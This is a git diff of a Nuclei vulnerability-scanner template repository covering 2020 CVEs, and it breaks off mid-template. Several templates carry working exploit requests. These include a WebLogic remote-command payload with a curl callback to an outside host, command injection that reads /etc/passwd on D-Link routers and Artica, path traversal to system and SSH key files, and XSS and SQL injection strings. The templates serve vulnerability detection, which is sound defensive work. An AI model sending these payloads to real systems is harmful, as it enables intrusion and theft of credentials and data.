- - type: word - part: body - words: - - "{{md5(num)}}" - - - type: status - status: - - 200 -# digest: 4a0a0047304502204ac6dc934c8fa1e8fc055bace785564fd1059344bfc62e1813a69e4456f1f2d4022100aa3cd7ba3eaa559de71b431812f927108fc69fa375bea0891ff3c729c4b64f48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11515.yaml b/nuclei-templates/CVE-2020/CVE-2020-11515.yaml deleted file mode 100644 index 7be2a1ca1c..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11515.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-11515 - -info: - name: > - Rank Math SEO <= 1.0.40.2 - Redirect Creation via Unprotected REST API Endpoint - author: topscoder - severity: high - description: > - The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to create new URIs (that redirect to an external web site) via the unsecured rankmath/v1/updateRedirection REST API endpoint. In other words, this is not an "Open Redirect" issue; instead, it allows the attacker to create a new URI with an arbitrary name (e.g., the /exampleredirect URI). - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/80dfc293-a182-4ed5-9127-6ec788312416?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H - cvss-score: 7.4 - cve-id: CVE-2020-11515 - metadata: - fofa-query: "wp-content/plugins/seo-by-rank-math/" - google-query: inurl:"/wp-content/plugins/seo-by-rank-math/" - shodan-query: 'vuln:CVE-2020-11515' - tags: cve,wordpress,wp-plugin,seo-by-rank-math,high - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "seo-by-rank-math" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 1.0.40') \ No newline at end of file diff --git a/nuclei-templates/wordpress/cve-2020-12054-4458.yaml b/nuclei-templates/CVE-2020/CVE-2020-12054.yaml similarity index 100% rename from nuclei-templates/wordpress/cve-2020-12054-4458.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12054.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-12116.yaml b/nuclei-templates/CVE-2020/CVE-2020-12116.yaml new file mode 100644 index 0000000000..27fceb2fac --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-12116.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-12116 + +info: + name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read + author: dwisiswant0 + severity: high + description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. + tags: cve,cve2020,zoho,lfi,manageengine + reference: https://github.com/BeetleChunks/CVE-2020-12116 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-12116 + cwe-id: CWE-22 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Connection: close + + - | + GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Cache-Control: max-age=0 + Connection: close + Referer: http://{{Hostname}} + + extractors: + - type: regex + name: endpoint + part: body + internal: true + regex: + - "(?m)/cachestart/.*/jquery/" + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "BEGIN RSA PRIVATE KEY")' + - 'status_code_2 == 200' + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-12256.yaml b/nuclei-templates/CVE-2020/CVE-2020-12256.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12256.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12256.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-12271.yaml b/nuclei-templates/CVE-2020/CVE-2020-12271.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12271.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12271.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-12447.yaml b/nuclei-templates/CVE-2020/CVE-2020-12447.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-12447.yaml rename to nuclei-templates/CVE-2020/CVE-2020-12447.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-13158.yaml b/nuclei-templates/CVE-2020/CVE-2020-13158.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-13158.yaml rename to nuclei-templates/CVE-2020/CVE-2020-13158.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-13700.yaml b/nuclei-templates/CVE-2020/CVE-2020-13700.yaml new file mode 100644 index 0000000000..640870ff70 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-13700.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-13700 +info: + name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference + author: pikpikcu + severity: high + description: | + WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values. + reference: + - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 + - https://wordpress.org/plugins/acf-to-rest-api/#developers + - https://github.com/airesvsg/acf-to-rest-api + - https://nvd.nist.gov/vuln/detail/CVE-2020-13700 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 + tags: cve,cve2020,wordpress,plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins' + matchers-condition: and + matchers: + - type: word + words: + - 'Content-Type: application/json' + part: header + - type: word + words: + - 'acf-to-rest-api\/class-acf-to-rest-api.php' + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml new file mode 100644 index 0000000000..2f1c79e2ee --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml @@ -0,0 +1,53 @@ +id: CVE-2020-14408 + +info: + name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting + author: edoardottt + severity: medium + description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. + reference: + - https://github.com/agentejo/cockpit/issues/1310 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-14408 + cwe-id: CWE-79 + epss-score: 0.00113 + epss-percentile: 0.44682 + cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: agentejo + product: cockpit + tags: cve2020,cve,cockpit,agentejo,xss,oss + +http: + - method: GET + path: + - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "redirectTo = '/92874';alert(document.domain)//280';" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100d9c05fb3baf867f35afbb4c5ecbc371b317d9ad9a8ce6ccb6c7fdbc1f3231cf902207c1160d456c6b712685c5c2f9c8f5a2c8102f6d5ec75ce531f6daa39b39f4bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-14750.yaml b/nuclei-templates/CVE-2020/CVE-2020-14750.yaml new file mode 100644 index 0000000000..fc9e6d83c2 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-14750.yaml @@ -0,0 +1,77 @@ +id: CVE-2020-14750 + +info: + name: Oracle WebLogic Server - Remote Command Execution + author: princechaddha,DhiyaneshDk + severity: critical + description: | + Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. + reference: + - https://github.com/pprietosanchez/CVE-2020-14750 + - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14750 + - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-14750 + epss-score: 0.97544 + epss-percentile: 0.99996 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: oracle + product: fusion_middleware + shodan-query: http.html:"Weblogic Application Server" + tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm + +http: + - raw: + - | + @timeout: 10s + POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 + Host: {{Hostname}} + Accept: */* + cmd: curl {{interactsh-url}} + Content-Type: application/x-www-form-urlencoded + + _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); + weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); + java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); + field.setAccessible(true); + Object obj = field.get(adapter); + weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); + String cmd = req.getHeader("cmd"); + String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; + if (cmd != null) { + String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); + weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); + res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); + res.getServletOutputStream().flush(); + res.getWriter().write(""); + }executeThread.interrupt(); + "); + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + part: header + words: + - "ADMINCONSOLESESSION=" + + - type: regex + part: body + regex: + - '(.*)' +# digest: 4b0a0048304602210089aca28d5d41776ea96aa0bb6616121eee0ef6ec762a650669fc5f6e650aab49022100c700af3059d9fd95fe63ddec43493d48232678dc50bc266a2f8cfaa26d4fcc09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-15004.yaml b/nuclei-templates/CVE-2020/CVE-2020-15004.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15004.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15004.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15050.yaml b/nuclei-templates/CVE-2020/CVE-2020-15050.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15050.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15050.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15299.yaml b/nuclei-templates/CVE-2020/CVE-2020-15299.yaml deleted file mode 100644 index 0788db9e3f..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-15299.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-15299 - -info: - name: > - Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme <= 2.9.4 - Reflected Cross-Site Scripting - author: topscoder - severity: medium - description: > - A reflected Cross-Site Scripting (XSS) Vulnerability in the KingComposer plugin through 2.9.4 for WordPress allows remote attackers to trick a victim into submitting an install_online_preset AJAX request containing base64-encoded JavaScript (in the kc-online-preset-data POST parameter) that is executed in the victim's browser. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/d52cdc45-efea-46b5-9004-f3169e807747?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-15299 - metadata: - fofa-query: "wp-content/plugins/kingcomposer/" - google-query: inurl:"/wp-content/plugins/kingcomposer/" - shodan-query: 'vuln:CVE-2020-15299' - tags: cve,wordpress,wp-plugin,kingcomposer,medium - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/kingcomposer/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "kingcomposer" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 2.9.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-15505.yaml b/nuclei-templates/CVE-2020/CVE-2020-15505.yaml deleted file mode 100644 index 3672a1f449..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-15505.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2020-15505 - -info: - name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - author: dwisiswant0 - severity: critical - description: | - A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors. - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[2] below. - # This template works by passing a Hessian header, otherwise; - # it will return a 403 or 500 internal server error. Reference[3]. - reference: - - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 - - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - - https://github.com/orangetw/JNDI-Injection-Bypass - tags: cve,cve2020,mobileiron,rce,sentry - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-15505 - -requests: - - raw: - - | - POST /mifs/.;/services/LogService HTTP/1.1 - Host: {{Hostname}} - Referer: https://{{Hostname}} - Content-Type: x-application/hessian - Connection: close - - {{hex_decode('630200480004')}} - matchers-condition: and - matchers: - - type: word - words: - - "application/x-hessian" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-16139.yaml b/nuclei-templates/CVE-2020/CVE-2020-16139.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16139.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16139.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml deleted file mode 100644 index 66a1295845..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: cve-2019-16920 - -info: - name: Unauthenticated Multiple D-Link Routers RCE - author: dwisiswant0 - severity: critical - description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. - - # References: - # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r - -requests: - - raw: - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-16952.yaml b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml new file mode 100644 index 0000000000..30a86624e1 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-16952 + +info: + name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE + author: dwisiswant0 + severity: high + description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951. + reference: + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 + - https://srcincite.io/pocs/cve-2020-16952.py.txt + - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md + tags: cve,cve2020,sharepoint,iis,microsoft + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2020-16952 + cwe-id: CWE-346 + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: regex + regex: + - "15\\.0\\.0\\.(4571|5275|4351|5056)" + - "16\\.0\\.0\\.(10337|10364|10366)" + # - "16.0.10364.20001" + condition: or + part: body + - type: word + words: + - "MicrosoftSharePointTeamServices" + part: header + - type: status + status: + - 200 + - 201 + condition: or diff --git a/nuclei-templates/CVE-2020/CVE-2020-17505.yaml b/nuclei-templates/CVE-2020/CVE-2020-17505.yaml new file mode 100644 index 0000000000..66a697edcf --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-17505.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-17505 + +info: + name: Artica Web Proxy 4.30 OS Command Injection + author: dwisiswant0 + severity: high + description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. + tags: cve,cve2020,rce,artica,proxy + reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-17505 + cwe-id: CWE-78 + +requests: + - raw: + - | + GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - "array(2)" + - "Position: ||whoami||" + - "root" + condition: and + + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-17519.yaml b/nuclei-templates/CVE-2020/CVE-2020-17519.yaml new file mode 100644 index 0000000000..5a3a611a2e --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-17519.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-17519 + +info: + name: Apache Flink directory traversal + author: pdteam + severity: high + description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. + reference: https://github.com/B1anda0/CVE-2020-17519 + tags: cve,cve2020,apache,lfi,flink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17519 + cwe-id: CWE-552 + +requests: + - method: GET + path: + - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-20982.yaml b/nuclei-templates/CVE-2020/CVE-2020-20982.yaml new file mode 100644 index 0000000000..f201f20073 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-20982.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-20982 + +info: + name: Shadoweb Wdja v1.5.1 xss + author: pikpikcu + severity: critical + reference: + - https://github.com/shadoweb/wdja/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 + tags: cve,cve2020,xss,wdja,shadoweb + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.60 + cve-id: CVE-2020-20982 + cwe-id: CWE-79 + description: "Cross Site Scripting (XSS) vulnerability in shadoweb wdja v1.5.1, allows attackers to execute arbitrary code and gain escalated privileges, via the backurl parameter to /php/passport/index.php." + +requests: + - method: GET + path: + - "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '' + + - type: word + part: header + words: + - 'text/html' diff --git a/nuclei-templates/CVE-2020/cve-2020-21224.yaml b/nuclei-templates/CVE-2020/CVE-2020-21224.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-21224.yaml rename to nuclei-templates/CVE-2020/CVE-2020-21224.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-22208.yaml b/nuclei-templates/CVE-2020/CVE-2020-22208.yaml new file mode 100644 index 0000000000..ff8cb13e1b --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-22208.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-22208 + +info: + name: 74cms - ajax_street.php 'x' SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database. + remediation: | + Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. + reference: + - https://github.com/blindkey/cve_like/issues/10 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-22208 + cwe-id: CWE-89 + epss-score: 0.19578 + epss-percentile: 0.9585 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: 74cms + product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" + tags: cve2020,cve,74cms,sqli +variables: + num: "999999999" + +http: + - method: GET + path: + - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#' + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' +# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-22211.yaml b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml new file mode 100644 index 0000000000..6ce1741b67 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-22211.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-22211 + +info: + name: 74cms - ajax_street.php 'key' SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms. + reference: + - https://github.com/blindkey/cve_like/issues/13 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-22211 + cwe-id: CWE-89 + epss-score: 0.20254 + epss-percentile: 0.95933 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: 74cms + product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" + tags: cve,cve2020,74cms,sqli +variables: + num: "999999999" + +http: + - method: GET + path: + - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' +# digest: 490a00463044022071b6a405d90f0054834aa1c5c3703f7bcb45b4f903a6bc652d448f4538db822a02200b1db00826ae2aff686f2d3c41ac214901596ef82ccf7dd22d40e04364765372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24912.yaml b/nuclei-templates/CVE-2020/CVE-2020-24912.yaml new file mode 100644 index 0000000000..aacac10ef1 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-24912.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-24912 + +info: + name: QCube Cross-Site-Scripting + author: pikpikcu + severity: medium + description: A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + reference: + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 + - http://seclists.org/fulldisclosure/2021/Mar/30 + tags: cve,cve2020,qcubed,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24912 + cwe-id: CWE-79 + +requests: + - method: POST + path: + - "{{BaseURL}}/assets/_core/php/profile.php" + - "{{BaseURL}}/assets/php/profile.php" + 